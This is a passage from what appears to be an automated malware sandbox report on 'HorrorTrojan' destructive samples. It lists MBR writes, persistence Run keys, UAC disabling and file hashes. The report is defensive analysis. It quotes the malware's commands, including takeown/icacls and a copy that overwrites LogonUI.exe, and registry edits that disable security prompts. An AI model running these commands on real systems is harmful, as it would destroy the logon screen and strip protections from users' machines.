N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description | Indicator | Process | Target
File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | C:\Windows\system32\reg.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | \??\c:\windows\WinAttr.gci | C:\Windows\SysWOW64\cmd.exe | N/A
File created | \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe | C:\Windows\system32\cmd.exe | N/A
File opened for modification | \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe | C:\Windows\system32\cmd.exe | N/A
File created | \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav | C:\Windows\system32\cmd.exe | N/A
File opened for modification | \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav | C:\Windows\system32\cmd.exe | N/A
File created | C:\windows\WinAttr.gci | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeTakeOwnershipPrivilege N/A C:\windows\SysWOW64\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5840 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe C:\Windows\system32\wscript.exe
PID 5840 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe C:\Windows\system32\wscript.exe
PID 1424 wrote to memory of 2508 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe
PID 1424 wrote to memory of 2508 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe
PID 1424 wrote to memory of 2508 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe
PID 1424 wrote to memory of 3568 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1424 wrote to memory of 3568 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 3568 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3568 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3568 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 6012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 6012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\783D.tmp\783E.tmp\783F.vbs //Nologo

C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe

"C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\783D.tmp\tools.cmd" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe

"C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe"

C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe

"C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe"

C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe

"C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004EC 0x00000000000004E8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\windows\SysWOW64\takeown.exe

"C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe

C:\windows\SysWOW64\icacls.exe

"C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65&copy "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit

C:\Windows\SysWOW64\takeown.exe

takeown /f LogonUI.exe

C:\Windows\SysWOW64\icacls.exe

icacls LogonUI.exe /granted "Admin":F

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "tobi0a0c.exe"

Network

Country Destination Domain Proto
US 150.171.27.10:443 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 95.101.143.34:443 tcp
GB 95.101.143.34:443 tcp
GB 95.101.143.34:443 tcp
GB 95.101.143.34:443 tcp
GB 95.101.143.34:443 tcp
GB 95.101.143.34:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\783D.tmp\783E.tmp\783F.vbs

MD5 a0679dce64fcf875f4208b823d4b85c0
SHA1 85abe3673db82bfe5b2c207dc98648e32afffea0
SHA256 85a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1
SHA512 1e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6

C:\Users\Admin\Desktop\YOUDIED 5.txt

MD5 05d30a59150a996af1258cdc6f388684
SHA1 c773b24888976c889284365dd0b584f003141f38
SHA256 c5e98b515636d1d7b2cd13326b70968b322469dbbe8c76fc7a84e236c1b579c9
SHA512 2144cd74536bc663d6031d7c718db64fd246346750304a8ceef5b58cd135d6ea061c43c9150334ee292c7367ff4991b118080152b8ebc9c5630b6c5186872a3a

C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe

MD5 74be3afd732dc010c8266326cc32127b
SHA1 a91802c200f10c09ff9a0679c274bbe55ecb7b41
SHA256 03fe34795ad0f91fc8eb8c9ebe8094541e4fb4d7095095f8b48f345c2a6d0f0c
SHA512 68fa03d640680e37614feccb56f4d41180724cb7c08ba25f9bea3830a44c03d635664d8e0255ab2d05d3613498f4a4dd4398b7971a2cb1c9ae3be93f944946e5

C:\Users\Admin\AppData\Local\Temp\783D.tmp\tools.cmd

MD5 288bebe9f904e6fabe4de67bd7897445
SHA1 0587ce2d936600a9eb142c6197fe12a0c3e8472f
SHA256 cf965fcc5a7ca4d9245c706c88b4d5013fb84be27b0ec262facccfadf14bdca2
SHA512 7db8e7c1318bcab7cef2c02484a82f347a630443a644b546a5cc339a5a848d1a3e915255f9c357de6ee26817a55d1091d80e2a8e97f66afa5686b3d11ee56c3c

memory/2508-221-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\783D.tmp\bg.bmp

MD5 a605dbeda4f89c1569dd46221c5e85b5
SHA1 5f28ce1e1788a083552b9ac760e57d278467a1f9
SHA256 77897f44096311ddb6d569c2a595eca3967c645f24c274318a51e5346816eb8e
SHA512 e4afa652f0133d51480f1d249c828600d02f024aa2cccfb58a0830a9d0c6ee56906736e6d87554ed25c4e69252536cb7379b60b2867b647966269c965b538610

C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe

MD5 c47c6a5111193af2c9337634b773d2d3
SHA1 036604921b67bbad60c7823482e5e6cb268ded14
SHA256 7c4f20624dd062a6c71d845d05c6328d5a903ca96398e2902506591b231ed585
SHA512 56698b7b2edc0f94d0f7172c853cbe67ac682d132df768659ebca0c169091acb36ffd0a6874c26e2fb35117061c91c9eca4312532ba778312e3d63cc77ce1262

C:\Users\Admin\AppData\Local\Temp\783D.tmp\mainbgtheme.wav

MD5 1b185a156cfc1ddeff939bf62672516b
SHA1 fd8b803400036f42c8d20ae491e2f1f040a1aed5
SHA256 e147a3c7a333cbc90e1bf9c08955d191ce83f33542297121635c1d79ecfdfa36
SHA512 41b33930e3efe628dae39083ef616baaf6ceb46056a94ab21b4b67eec490b0442a4211eaab79fce1f75f40ecdc853d269c82b5c5389081102f11e0f2f6503ae7

C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe

MD5 4151b988c9d5c550ccb6c3b49bf551d4
SHA1 10ff979be4a5bbacaf208bdbb8236b940208eed1
SHA256 5ec45cc1a109f556d0cd44ba48d3bf11af556ee66dd8b78c94d3ef0e93735e8e
SHA512 c73947b534741c29340550066cd1a6b7cbb4387f3be8303f2d1d0cb21c6f430e0415c27daabc82d32570f421934db78dc840403de18aef09d5a4f0cbe4350e4d

C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe

MD5 219cd85d93a4ed65a481f353a3de5376
SHA1 a38ab77caf5417765d5595b2fcd859c6354bf079
SHA256 00c9fdc8b877c7fb8365709155ab28cb3dac282ae7ec9fc9d47a78b408e0d13f
SHA512 367644e3bc3310207b5863b09688269c38a55540b8c87e71d66771c954d37d561ed09f3ee11b36c4c8f4a48b618b2e8debae3d93ff684d15305f93a3ade6b3d9

memory/5968-240-0x00000000009F0000-0x0000000000EF2000-memory.dmp

memory/5968-241-0x0000000005E90000-0x0000000006436000-memory.dmp

memory/5968-242-0x00000000059C0000-0x0000000005A52000-memory.dmp

memory/5968-243-0x0000000005E50000-0x0000000005E5A000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 b7443e89f0cb29d51ee6a257750e54d2
SHA1 84127eebf275e781d5276af6fc4d09c5a6bfb7b9
SHA256 8226877d6ab2e4834aea6bc71bd9865b28d0bd1ec2e8b4c23b8acf0301c56f26
SHA512 446cfe25d82f3bbf7badd324cae691ad62e13bd7469e415f47b9141bddf30679219c672937f4f6768796c2936c3b9c557fabbda1fb51c5edbb7c1964bffa17be

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:19

Platform

win11-20241007-en

Max time kernel

300s

Max time network

230s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe"

Network

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:14

Platform

win11-20241007-en

Max time kernel

11s

Max time network

14s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dest\Start.bat"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" C:\Windows\SysWOW64\reg.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\covid20\\bg.bmp" C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" C:\Windows\SysWOW64\reg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\425634766\3423304070.pri C:\Windows\system32\LogonUI.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\shutdown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
